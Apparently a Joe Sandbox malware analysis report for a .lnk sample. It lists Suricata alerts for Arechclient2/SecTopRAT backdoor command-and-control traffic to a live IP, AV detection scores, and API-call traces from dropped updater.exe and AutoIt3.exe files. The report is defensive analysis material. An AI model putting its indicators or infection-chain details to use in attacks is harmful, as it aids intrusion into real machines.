2024-12-17T08:10:46.575517+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.696672+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.819115+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.867148+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.938958+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:47.065449+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:47.185491+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:47.305449+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:11:59.275899+0100	2051910	1	A Network Trojan was detected	192.168.2.7	50048	185.147.124.236	15647	TCP
2024-12-17T08:12:03.308965+0100	2051910	1	A Network Trojan was detected	192.168.2.7	50063	185.147.124.236	15647	TCP

ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:10:50.727590+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49821	185.147.124.236	9000	TCP
2024-12-17T08:10:52.343328+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49828	185.147.124.236	9000	TCP
2024-12-17T08:10:53.885832+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49830	185.147.124.236	9000	TCP
2024-12-17T08:10:55.431356+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49837	185.147.124.236	9000	TCP
2024-12-17T08:10:56.978520+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49843	185.147.124.236	9000	TCP
2024-12-17T08:10:58.525309+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49846	185.147.124.236	9000	TCP
2024-12-17T08:11:00.075555+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49852	185.147.124.236	9000	TCP
2024-12-17T08:11:01.610350+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49857	185.147.124.236	9000	TCP
2024-12-17T08:11:03.148377+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49861	185.147.124.236	9000	TCP
2024-12-17T08:11:04.707352+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49867	185.147.124.236	9000	TCP
2024-12-17T08:11:06.252751+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49873	185.147.124.236	9000	TCP
2024-12-17T08:11:07.797637+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49876	185.147.124.236	9000	TCP
2024-12-17T08:11:09.345741+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49882	185.147.124.236	9000	TCP
2024-12-17T08:11:10.892885+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49888	185.147.124.236	9000	TCP
2024-12-17T08:11:12.430923+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49891	185.147.124.236	9000	TCP
2024-12-17T08:11:14.232249+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49898	185.147.124.236	9000	TCP
2024-12-17T08:11:15.777458+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49903	185.147.124.236	9000	TCP
2024-12-17T08:11:17.323931+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49908	185.147.124.236	9000	TCP
2024-12-17T08:11:19.011147+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49912	185.147.124.236	9000	TCP
2024-12-17T08:11:20.556013+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49918	185.147.124.236	9000	TCP
2024-12-17T08:11:22.102985+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49925	185.147.124.236	9000	TCP
2024-12-17T08:11:23.649156+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49927	185.147.124.236	9000	TCP
2024-12-17T08:11:25.189370+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49934	185.147.124.236	9000	TCP
2024-12-17T08:11:26.729269+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49939	185.147.124.236	9000	TCP
2024-12-17T08:11:28.273021+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49945	185.147.124.236	9000	TCP
2024-12-17T08:11:29.911718+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49948	185.147.124.236	9000	TCP
2024-12-17T08:11:31.439666+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49954	185.147.124.236	9000	TCP
2024-12-17T08:11:32.980422+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49960	185.147.124.236	9000	TCP
2024-12-17T08:11:34.518294+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49964	185.147.124.236	9000	TCP
2024-12-17T08:11:36.059783+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49969	185.147.124.236	9000	TCP
2024-12-17T08:11:37.628765+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49975	185.147.124.236	9000	TCP
2024-12-17T08:11:39.163597+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49982	185.147.124.236	9000	TCP
2024-12-17T08:11:40.703138+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49984	185.147.124.236	9000	TCP
2024-12-17T08:11:42.253405+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49990	185.147.124.236	9000	TCP
2024-12-17T08:11:43.796182+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49996	185.147.124.236	9000	TCP
2024-12-17T08:11:45.336935+0100	2052248	1	A Network Trojan was detected	192.168.2.7	49999	185.147.124.236	9000	TCP
2024-12-17T08:11:46.875999+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50005	185.147.124.236	9000	TCP
2024-12-17T08:11:48.405536+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50011	185.147.124.236	9000	TCP
2024-12-17T08:11:49.938950+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50016	185.147.124.236	9000	TCP
2024-12-17T08:11:51.476347+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50020	185.147.124.236	9000	TCP
2024-12-17T08:11:53.008843+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50025	185.147.124.236	9000	TCP
2024-12-17T08:11:54.546737+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50030	185.147.124.236	9000	TCP
2024-12-17T08:11:56.087410+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50034	185.147.124.236	9000	TCP
2024-12-17T08:11:57.627678+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50039	185.147.124.236	9000	TCP
2024-12-17T08:11:59.165635+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50045	185.147.124.236	9000	TCP
2024-12-17T08:12:00.712008+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50049	185.147.124.236	9000	TCP
2024-12-17T08:12:02.263672+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50056	185.147.124.236	9000	TCP
2024-12-17T08:12:03.831888+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50060	185.147.124.236	9000	TCP
2024-12-17T08:12:05.359961+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50067	185.147.124.236	9000	TCP
2024-12-17T08:12:06.915332+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50069	185.147.124.236	9000	TCP
2024-12-17T08:12:08.454854+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50074	185.147.124.236	9000	TCP
2024-12-17T08:12:09.995385+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50080	185.147.124.236	9000	TCP
2024-12-17T08:12:17.310871+0100	2052248	1	A Network Trojan was detected	192.168.2.7	50083	185.147.124.236	9000	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:10:27.449637+0100	2803305	3	Unknown Traffic	192.168.2.7	49745	172.217.17.46	443	TCP
2024-12-17T08:10:33.085428+0100	2803305	3	Unknown Traffic	192.168.2.7	49765	172.217.17.46	443	TCP
2024-12-17T08:10:35.961119+0100	2803305	3	Unknown Traffic	192.168.2.7	49774	172.217.17.46	443	TCP
2024-12-17T08:10:38.524708+0100	2803305	3	Unknown Traffic	192.168.2.7	49786	142.250.181.100	443	TCP
2024-12-17T08:10:41.964771+0100	2803305	3	Unknown Traffic	192.168.2.7	49792	172.217.17.46	443	TCP
2024-12-17T08:10:44.766727+0100	2803305	3	Unknown Traffic	192.168.2.7	49802	172.217.17.46	443	TCP
2024-12-17T08:10:47.262193+0100	2803305	3	Unknown Traffic	192.168.2.7	49808	142.250.181.100	443	TCP
2024-12-17T08:10:50.169345+0100	2803305	3	Unknown Traffic	192.168.2.7	49816	172.217.17.46	443	TCP
2024-12-17T08:10:52.343328+0100	2803305	3	Unknown Traffic	192.168.2.7	49828	185.147.124.236	9000	TCP
2024-12-17T08:10:52.979045+0100	2803305	3	Unknown Traffic	192.168.2.7	49823	172.217.17.46	443	TCP
2024-12-17T08:10:53.885832+0100	2803305	3	Unknown Traffic	192.168.2.7	49830	185.147.124.236	9000	TCP
2024-12-17T08:10:55.431356+0100	2803305	3	Unknown Traffic	192.168.2.7	49837	185.147.124.236	9000	TCP
2024-12-17T08:10:55.489385+0100	2803305	3	Unknown Traffic	192.168.2.7	49832	142.250.181.100	443	TCP
2024-12-17T08:10:56.978520+0100	2803305	3	Unknown Traffic	192.168.2.7	49843	185.147.124.236	9000	TCP
2024-12-17T08:10:58.417762+0100	2803305	3	Unknown Traffic	192.168.2.7	49842	172.217.17.46	443	TCP
2024-12-17T08:10:58.525309+0100	2803305	3	Unknown Traffic	192.168.2.7	49846	185.147.124.236	9000	TCP
2024-12-17T08:11:00.075555+0100	2803305	3	Unknown Traffic	192.168.2.7	49852	185.147.124.236	9000	TCP
2024-12-17T08:11:01.271707+0100	2803305	3	Unknown Traffic	192.168.2.7	49851	172.217.17.46	443	TCP
2024-12-17T08:11:03.148377+0100	2803305	3	Unknown Traffic	192.168.2.7	49861	185.147.124.236	9000	TCP
2024-12-17T08:11:03.972658+0100	2803305	3	Unknown Traffic	192.168.2.7	49859	142.250.181.100	443	TCP
2024-12-17T08:11:04.707352+0100	2803305	3	Unknown Traffic	192.168.2.7	49867	185.147.124.236	9000	TCP
2024-12-17T08:11:06.694137+0100	2803305	3	Unknown Traffic	192.168.2.7	49869	172.217.17.46	443	TCP
2024-12-17T08:11:07.797637+0100	2803305	3	Unknown Traffic	192.168.2.7	49876	185.147.124.236	9000	TCP
2024-12-17T08:11:09.345741+0100	2803305	3	Unknown Traffic	192.168.2.7	49882	185.147.124.236	9000	TCP
2024-12-17T08:11:09.602028+0100	2803305	3	Unknown Traffic	192.168.2.7	49880	172.217.17.46	443	TCP
2024-12-17T08:11:10.892885+0100	2803305	3	Unknown Traffic	192.168.2.7	49888	185.147.124.236	9000	TCP
2024-12-17T08:11:12.137208+0100	2803305	3	Unknown Traffic	192.168.2.7	49889	142.250.181.100	443	TCP
2024-12-17T08:11:12.430923+0100	2803305	3	Unknown Traffic	192.168.2.7	49891	185.147.124.236	9000	TCP
2024-12-17T08:11:14.889170+0100	2803305	3	Unknown Traffic	192.168.2.7	49896	172.217.17.46	443	TCP
2024-12-17T08:11:15.777458+0100	2803305	3	Unknown Traffic	192.168.2.7	49903	185.147.124.236	9000	TCP
2024-12-17T08:11:17.323931+0100	2803305	3	Unknown Traffic	192.168.2.7	49908	185.147.124.236	9000	TCP
2024-12-17T08:11:17.795008+0100	2803305	3	Unknown Traffic	192.168.2.7	49904	172.217.17.46	443	TCP
2024-12-17T08:11:19.011147+0100	2803305	3	Unknown Traffic	192.168.2.7	49912	185.147.124.236	9000	TCP
2024-12-17T08:11:20.284309+0100	2803305	3	Unknown Traffic	192.168.2.7	49913	142.250.181.100	443	TCP
2024-12-17T08:11:20.556013+0100	2803305	3	Unknown Traffic	192.168.2.7	49918	185.147.124.236	9000	TCP
2024-12-17T08:11:22.102985+0100	2803305	3	Unknown Traffic	192.168.2.7	49925	185.147.124.236	9000	TCP
2024-12-17T08:11:23.075863+0100	2803305	3	Unknown Traffic	192.168.2.7	49922	172.217.17.46	443	TCP
2024-12-17T08:11:25.978115+0100	2803305	3	Unknown Traffic	192.168.2.7	49932	172.217.17.46	443	TCP
2024-12-17T08:11:28.273021+0100	2803305	3	Unknown Traffic	192.168.2.7	49945	185.147.124.236	9000	TCP
2024-12-17T08:11:28.607588+0100	2803305	3	Unknown Traffic	192.168.2.7	49941	142.250.181.100	443	TCP
2024-12-17T08:11:29.911718+0100	2803305	3	Unknown Traffic	192.168.2.7	49948	185.147.124.236	9000	TCP
2024-12-17T08:11:31.778870+0100	2803305	3	Unknown Traffic	192.168.2.7	49949	172.217.17.46	443	TCP
2024-12-17T08:11:34.719815+0100	2803305	3	Unknown Traffic	192.168.2.7	49961	172.217.17.46	443	TCP
2024-12-17T08:11:37.221887+0100	2803305	3	Unknown Traffic	192.168.2.7	49970	142.250.181.100	443	TCP
2024-12-17T08:11:37.628765+0100	2803305	3	Unknown Traffic	192.168.2.7	49975	185.147.124.236	9000	TCP
2024-12-17T08:11:39.163597+0100	2803305	3	Unknown Traffic	192.168.2.7	49982	185.147.124.236	9000	TCP
2024-12-17T08:11:40.140824+0100	2803305	3	Unknown Traffic	192.168.2.7	49977	172.217.17.46	443	TCP
2024-12-17T08:11:42.903142+0100	2803305	3	Unknown Traffic	192.168.2.7	49989	172.217.17.46	443	TCP
2024-12-17T08:11:43.796182+0100	2803305	3	Unknown Traffic	192.168.2.7	49996	185.147.124.236	9000	TCP
2024-12-17T08:11:45.404157+0100	2803305	3	Unknown Traffic	192.168.2.7	49997	142.250.181.100	443	TCP
2024-12-17T08:11:48.389618+0100	2803305	3	Unknown Traffic	192.168.2.7	50004	172.217.17.46	443	TCP
2024-12-17T08:11:51.217521+0100	2803305	3	Unknown Traffic	192.168.2.7	50014	172.217.17.46	443	TCP
2024-12-17T08:11:53.008843+0100	2803305	3	Unknown Traffic	192.168.2.7	50025	185.147.124.236	9000	TCP
2024-12-17T08:11:53.708931+0100	2803305	3	Unknown Traffic	192.168.2.7	50024	142.250.181.100	443	TCP
2024-12-17T08:11:56.087410+0100	2803305	3	Unknown Traffic	192.168.2.7	50034	185.147.124.236	9000	TCP
2024-12-17T08:11:56.434833+0100	2803305	3	Unknown Traffic	192.168.2.7	50031	172.217.17.46	443	TCP
2024-12-17T08:11:57.627678+0100	2803305	3	Unknown Traffic	192.168.2.7	50039	185.147.124.236	9000	TCP
2024-12-17T08:11:59.339579+0100	2803305	3	Unknown Traffic	192.168.2.7	50041	172.217.17.46	443	TCP
2024-12-17T08:12:01.069307+0100	2803305	3	Unknown Traffic	192.168.2.7	50050	142.250.181.100	443	TCP
2024-12-17T08:12:02.263672+0100	2803305	3	Unknown Traffic	192.168.2.7	50056	185.147.124.236	9000	TCP
2024-12-17T08:12:03.831888+0100	2803305	3	Unknown Traffic	192.168.2.7	50060	185.147.124.236	9000	TCP
2024-12-17T08:12:06.915332+0100	2803305	3	Unknown Traffic	192.168.2.7	50069	185.147.124.236	9000	TCP
2024-12-17T08:12:08.454854+0100	2803305	3	Unknown Traffic	192.168.2.7	50074	185.147.124.236	9000	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:10:35.145473+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49776	104.21.87.65	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: fsg5PWtTm2.lnk	Virustotal: Detection: 33%			Perma Link
Source: fsg5PWtTm2.lnk	ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for sample

Source: fsg5PWtTm2.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.100:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:50014 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbg source: powershell.exe, 0000000E.00000002.2538291906.000001CAB4EBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000E.00000002.2538689516.000001CAB4F1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2534114486.000001CAB4C30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ment.Automation.pdb source: powershell.exe, 0000000E.00000002.2538689516.000001CAB4F1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.2534114486.000001CAB4C30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: updater.exe, 0000001B.00000003.1695944699.0000000005F89000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1698696022.0000000005E68000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1707041169.0000000006004000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868331767.0000000005EF8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868202399.0000000006019000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873378059.0000000006094000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945401358.0000000005DC8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945264320.0000000005EE9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: updater.exe, 0000001B.00000003.1695944699.0000000005F89000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1698696022.0000000005E68000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1707041169.0000000006004000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868331767.0000000005EF8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868202399.0000000006019000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873378059.0000000006094000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945401358.0000000005DC8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945264320.0000000005EE9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb} source: powershell.exe, 0000000E.00000002.2538291906.000001CAB4EBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000000E.00000002.2464474213.000001CA9ACCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2538689516.000001CAB4F1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6?ll\System.pdb source: powershell.exe, 0000000E.00000002.2538291906.000001CAB4EBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000E.00000002.2534114486.000001CAB4C30000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C14005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00C14005
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_00C1C2FF
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1494A GetFileAttributesW,FindFirstFileW,FindClose,	27_2_00C1494A
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	27_2_00C1CD9F
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1CD14 FindFirstFileW,FindClose,	27_2_00C1CD14
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_00C1F5D8
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_00C1F735
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_00C1FA36
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C13CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00C13CE2
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B46BD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	27_2_017B46BD
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B47C5 FindFirstFileA,GetLastError,	27_2_017B47C5
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B1FED GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	27_2_017B1FED
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	29_2_003A4005
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	29_2_003AC2FF
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A494A GetFileAttributesW,FindFirstFileW,FindClose,	29_2_003A494A
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003ACD14 FindFirstFileW,FindClose,	29_2_003ACD14
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003ACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	29_2_003ACD9F
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	29_2_003AF5D8
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	29_2_003AF735
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	29_2_003AFA36
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	29_2_003A3CE2
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018A45F5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	29_2_018A45F5
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018A46FD FindFirstFileA,GetLastError,	29_2_018A46FD
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018A1F25 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	29_2_018A1F25

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B1DFF5h		28_2_06B1D9CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B1DFF5h		28_2_06B1DFD1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.7:49810 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49821 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.7:49810
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49846 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49830 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49861 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49843 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49857 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49873 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49876 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49888 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49828 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49891 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49898 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49912 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49934 -> 185.147.124.236:9000
